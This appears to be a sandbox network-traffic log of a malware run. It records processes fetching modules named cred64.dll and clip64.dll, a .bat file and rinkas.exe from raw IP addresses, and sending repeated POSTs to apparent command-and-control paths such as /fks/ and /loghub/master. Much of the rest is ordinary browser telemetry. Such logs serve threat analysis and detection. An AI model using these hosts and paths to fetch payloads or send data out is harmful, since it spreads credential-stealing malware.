set-cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6; Domain=.microsoft.com; Expires=Thu, 12 Oct 2023 21:18:37 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2554
access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Thu, 12 Oct 2023 20:48:36 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 3899
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1697143715983
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 2554
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6

Response

HTTP/2.0 200

content-length: 153
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1664
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Thu, 12 Oct 2023 20:48:37 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2057
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1697143719317
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 2554
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 2237
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Thu, 12 Oct 2023 20:48:41 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 1908
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1697143742290
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: use-collector-delta
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 2011
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Thu, 12 Oct 2023 20:49:03 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2058
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1697143744291
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 2011
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1635
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Thu, 12 Oct 2023 20:49:05 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2096
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1697143751288
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 2011
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1644
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Thu, 12 Oct 2023 20:49:12 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 1942
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1697143753549
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 2011
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1648
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Thu, 12 Oct 2023 20:49:14 GMT
DNS

89.16.208.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.16.208.104.in-addr.arpa

IN PTR

Response
GET

https://api.ip.sb/geoip

475D.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 12 Oct 2023 20:48:39 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BwdVsFDpuZghdiwrWAgtxPENfXDfD3aVhGtz%2FlXveHXp9VE5gzmmy6%2BwjzTAVTraIEpDo1bzXCBhHIyN8ADgkSPEHB8K%2BCiIMhzKCVq%2FAzfQe%2Flna%2BnwjHGKjA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 81523477acc31cc6-AMS
alt-svc: h3=":443"; ma=86400
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:48:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Thu, 12 Oct 2023 20:48:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.251.36.14:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

14.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.36.251.142.in-addr.arpa

IN PTR

Response

14.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f141e100net
DNS

137.71.105.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

137.71.105.51.in-addr.arpa

IN PTR

Response
DNS

197.98.23.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.98.23.89.in-addr.arpa

IN PTR

Response
DNS

197.98.23.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.98.23.89.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301145_1Y8CXK45BT2OHNQQQ&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301145_1Y8CXK45BT2OHNQQQ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 300661
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EC4EDF2D60534A69B2F3FD7B8F8FD6A8 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
date: Thu, 12 Oct 2023 20:49:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301554_133DWC45UAH2W18HX&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301554_133DWC45UAH2W18HX&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 262756
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7880DC989F4D49FFA96F5638F6EFC9E5 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
date: Thu, 12 Oct 2023 20:49:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301168_16G64C18QUW861YM2&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301168_16G64C18QUW861YM2&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 535868
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D1DFF0BD5EC0438EAF3F3A1B610C8DA3 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
date: Thu, 12 Oct 2023 20:49:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301577_1B5OIQ9XH8JLMH3HW&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301577_1B5OIQ9XH8JLMH3HW&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 450187
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3DA6737965054AC282B349CAC15869B6 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
date: Thu, 12 Oct 2023 20:49:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300969_156V9EGCLLGG8U764&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300969_156V9EGCLLGG8U764&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 379725
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6A137641768F4658ADCF71BB1C5C2B33 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
date: Thu, 12 Oct 2023 20:49:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301402_14KUDKAGB5S6I0PY4&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301402_14KUDKAGB5S6I0PY4&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301657_1A2Y2HPL5GA07URZQ&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301657_1A2Y2HPL5GA07URZQ&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301248_1XIEMIBBUMA1BDE5T&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301248_1XIEMIBBUMA1BDE5T&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301143_11K66B0WIWZ9F4H58&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301143_11K66B0WIWZ9F4H58&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300931_116ZGE2JLLUHLMEDS&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300931_116ZGE2JLLUHLMEDS&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

77.91.68.29:80

http://77.91.68.29/fks/

http

165.9kB
3.9MB
2746
2818

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.52:80

http://77.91.68.52/fuza/3.bat

http

435 B
592 B
6
5

HTTP Request

GET http://77.91.68.52/fuza/3.bat

HTTP Response

200
77.91.68.29:80

http://77.91.68.29/fks/

http

83.0kB
1.6MB
1203
1207

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
5.42.92.211:80

http://5.42.92.211/loghub/master

http

AppLaunch.exe

748 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/rinkas.exe

http

4.0kB
209.5kB
84
161

HTTP Request

GET http://5.42.65.80/rinkas.exe

HTTP Response

200
185.216.70.222:80

